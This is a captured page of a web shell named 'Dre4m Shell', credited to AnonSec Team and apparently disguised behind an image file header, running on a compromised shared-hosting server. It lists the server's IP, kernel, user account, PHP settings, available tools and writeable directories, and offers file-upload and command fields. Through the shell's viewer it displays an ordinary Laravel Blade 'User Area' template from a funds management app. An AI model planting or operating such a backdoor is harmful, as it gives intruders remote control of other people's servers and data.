ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.145.125.116
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/fundscopied/resources/views/main/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/fundscopied/resources/views/main/userArea.blade.php
@extends('layouts.layout')
@section('pageTitle')
User Area
@endsection

@section('content')
<div class="box-body">
	<div class="row">
		<div class="col-md-12">
			<div class="box box-solid">
				<div class="box-header with-border">
				
				@include('layouts.allReportHeader', ['companyName'=>'defaultName', 'companyAddress'=>'defaultAddress', 'title1'=>'WELCOME TO FUNDS MANAGEMENT SYSTEM', 'title2'=>date('d-l, F, Y'), 'showOnlyTitle1'=>1, 'showOnlyTitle2'=>1, 'hideLogos'=>0, 'hideAddress'=>0])
					
					<br />
				</div>
				
				
				<div class="box-body" style="height:500px;">
					<div class="row">
						<div class="col-md-12">
						<h4 class="text-red lead text-center">If you need assistance, pls send a mail to support@mbrcomputers.com <br /> Thank you</h4>
						</div>
						<!--<div class="col-md-4">
						     <div align="center">
							<!-- Learn about this code on MDN: https://developer.mozilla.org/en-US/docs/Web/API/Canvas_API/Tutorial/Basic_animations -->
							<canvas id="canvas-NOT" width="300" height="300"></canvas>
						     </div>
						</div>-->
						
					</div>
				</div>
			</div>
		</div>

@endsection

@section('styles')
   <style>
	html {
	  background: black;
	  height: 100%;
	  position: relative;
	  overflow: hidden;
	}
	
	.container{
	  height: 300px;
	  width: 300px;
	  position: absolute;
	  top: 50%;
	  left: 50%;
	  margin: -150px 0 0 -150px;
	}
	
	.square{
	  height: 94%;
	  width: 94%;
	  background: white;
	  position: absolute;
	  top: 50%;
	  left: 50%;
	  margin: -47% 0 0 -47%;
	}
	
	.black{ 
	  background: black;  
	  animation: rotate 10s infinite linear; 
	}
	
	@keyframes rotate{
	  0%{ transform: rotate(0deg); }
	    100%{ transform: rotate(360deg); }  
	}
  </style>
@endsection

@section('scripts')
	<script>
	var sun = new Image();
	var moon = new Image();
	var earth = new Image();
	function init() {
	  sun.src = 'https://mdn.mozillademos.org/files/1456/Canvas_sun.png';
	  moon.src = 'https://mdn.mozillademos.org/files/1443/Canvas_moon.png';
	  earth.src = 'https://mdn.mozillademos.org/files/1429/Canvas_earth.png';
	  window.requestAnimationFrame(draw);
	}
	
	function draw() {
	  var ctx = document.getElementById('canvas').getContext('2d');
	
	  ctx.globalCompositeOperation = 'destination-over';
	  ctx.clearRect(0, 0, 300, 300); // clear canvas
	
	  ctx.fillStyle = 'rgba(0, 0, 0, 0.4)';
	  ctx.strokeStyle = 'rgba(0, 153, 255, 0.4)';
	  ctx.save();
	  ctx.translate(150, 150);
	
	  // Earth
	  var time = new Date();
	  ctx.rotate(((2 * Math.PI) / 60) * time.getSeconds() + ((2 * Math.PI) / 60000) * time.getMilliseconds());
	  ctx.translate(105, 0);
	  ctx.fillRect(0, -12, 50, 24); // Shadow
	  ctx.drawImage(earth, -12, -12);
	
	  // Moon
	  ctx.save();
	  ctx.rotate(((2 * Math.PI) / 6) * time.getSeconds() + ((2 * Math.PI) / 6000) * time.getMilliseconds());
	  ctx.translate(0, 28.5);
	  ctx.drawImage(moon, -3.5, -3.5);
	  ctx.restore();
	
	  ctx.restore();
	  
	  ctx.beginPath();
	  ctx.arc(150, 150, 105, 0, Math.PI * 2, false); // Earth orbit
	  ctx.stroke();
	 
	  ctx.drawImage(sun, 0, 0, 300, 300);
	
	  window.requestAnimationFrame(draw);
	}
	
	init();
	</script>
@endsection


Anon7 - 2022
AnonSec Team